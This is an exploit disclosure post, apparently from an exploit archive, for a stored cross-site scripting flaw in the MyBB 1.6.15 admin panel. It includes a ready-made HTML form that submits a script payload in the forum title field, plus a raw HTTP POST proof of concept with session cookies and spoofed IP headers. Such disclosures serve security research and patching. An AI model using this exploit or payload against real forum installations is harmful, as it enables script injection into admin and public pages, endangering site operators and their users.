MyBB 1.6.15 => Admin Panel Stored XSS Cross-Site Scripting
2014-08-31 00:08:18Posted by: Daisuke Dan
############################################################################################
# ____ __ ____
# /\ _`\ __ /\ \ /\ _`\
# \ \ \/\ \ __ /\_\ ____ __ __\ \ \/'\ __ \ \ \/\ \ __ ___
# \ \ \ \ \ /'__`\ \/\ \ /',__\/\ \/\ \\ \ , < /'__`\ \ \ \ \ \ /'__`\ /' _ `\
# \ \ \_\ \/\ \L\.\_\ \ \/\__, `\ \ \_\ \\ \ \\`\ /\ __/ \ \ \_\ \/\ \L\.\_/\ \/\ \
# \ \____/\ \__/.\_\\ \_\/\____/\ \____/ \ \_\ \_\ \____\ \ \____/\ \__/.\_\ \_\ \_\
# \/___/ \/__/\/_/ \/_/\/___/ \/___/ \/_/\/_/\/____/ \/___/ \/__/\/_/\/_/\/_/
#
# [+] Exploit: MyBB 1.6.15 => Admin Panel Stored XSS Vulnerability
# [+] Author: Daisuke Dan
# [+] Twitter: http://twitter.com/TheHackersBay
# [+] Mail: [email protected]
# [+] Date: 2014-08-30
# [+] Software Link: http://resources.mybb.com/downloads/mybb_1615.zip
# [+] Vendor Homepage: http://www.mybb.com/
#
############################################################################################
=============
Introduction:
=============
MyBB is the free and open source, intuitive, extensible, and incredibly powerful forum software you've been looking for.
=========
Abstract:
=========
I discovered a stored cross-site scripting vulnerability in the admin panel who allows to inject an XSS in forum's titles. The XSS works in the index page, the adminstrator logs page, and the categories management page.
========
Details:
========
Vulnerable Module(s):
[+] name
Vulnerable File(s):
[+] /admin/modules/management.php
Vulnerable Parameter(s):
[+] title
========
Exploit:
========
<title>MyBB 1.6.15 XSS Exploit</title>
<img src="http://i.imgur.com/q4jsOKR.png"><br>
<font color="green" size="5">CMS type:</font><font color="black" size="5"> MyBB</font><br>
<font color="green" size="5">Version:</font><font color="black" size="5"> 1.6.15</font><br>
<font color="green" size="5">Vulnerability Type:</font><font color="black" size="5"> Stored XSS Cross-Site Scripting Vulnerability</font><br>
<font color="green" size="5">Require:</font><font color="black" size="5"> Logged into admin panel</font><br>
<form action="/mybb/admin/index.php?module=forum-management&action=add" method="post">
<input name="type" value="f" class="radio_input" id="forum" checked="checked" type="hidden">
<select name="pid" id="pid" type="hidden"><option value="1"></option></select>
<input type="hidden" name="my_post_key" value="7135b96e157ae6e80968eb018ede9252" />
<input name="title" value="'"><script>alert('1337')</script>" class="text_input" id="title" type="hidden">
<input name="disporder" value="1" class="text_input" id="disporder" type="hidden">
<input value="XSS Exploit" class="submit_button" type="submit">
</form>
====
PoC:
====
POST: http://localhost/mybb/admin/index.php?module=forum-management&action=add
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://localhost/mybb/exploit.html
Cookie: acploginattempts=0; mybb[lastvisit]=1409427100; mybb[lastactive]=1409431392; loginattempts=1; mybbuser=1_RsrJwzcb99PNgDASqKpUFGsEfZRsnaYRTD3b4Kz9798g2wv2d2; adminsid=5bbdf6bbcf39077ef0c920a6d6b24234; sid=4b32887045572507f3ec966f28093ea3
X-FORWARDED-FOR: 95.101.0.194
VIA: 23.223.36.212
CLIENT-IP: 23.50.67.36
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
POST: type=f&pid=1&my_post_key=7135b96e157ae6e80968eb018ede9252&title='"><script>alert('1337')</script>&disporder=1
[+] Screens:
Categories management XSS: http://i.imgur.com/ZwFNd9T.png
Administrator logs XSS: http://i.imgur.com/uSzG4zN.png
Index page XSS: http://i.imgur.com/O5W2KAG.png
========
Credits:
========
Daisuke Dan (aka Lin Kode) - The Hackers Bay
==========
Greets to:
==========
Raw-x, n3tw0rk, Osanda
Fixes
No fixesIn order to submit a new fix you need to be registered.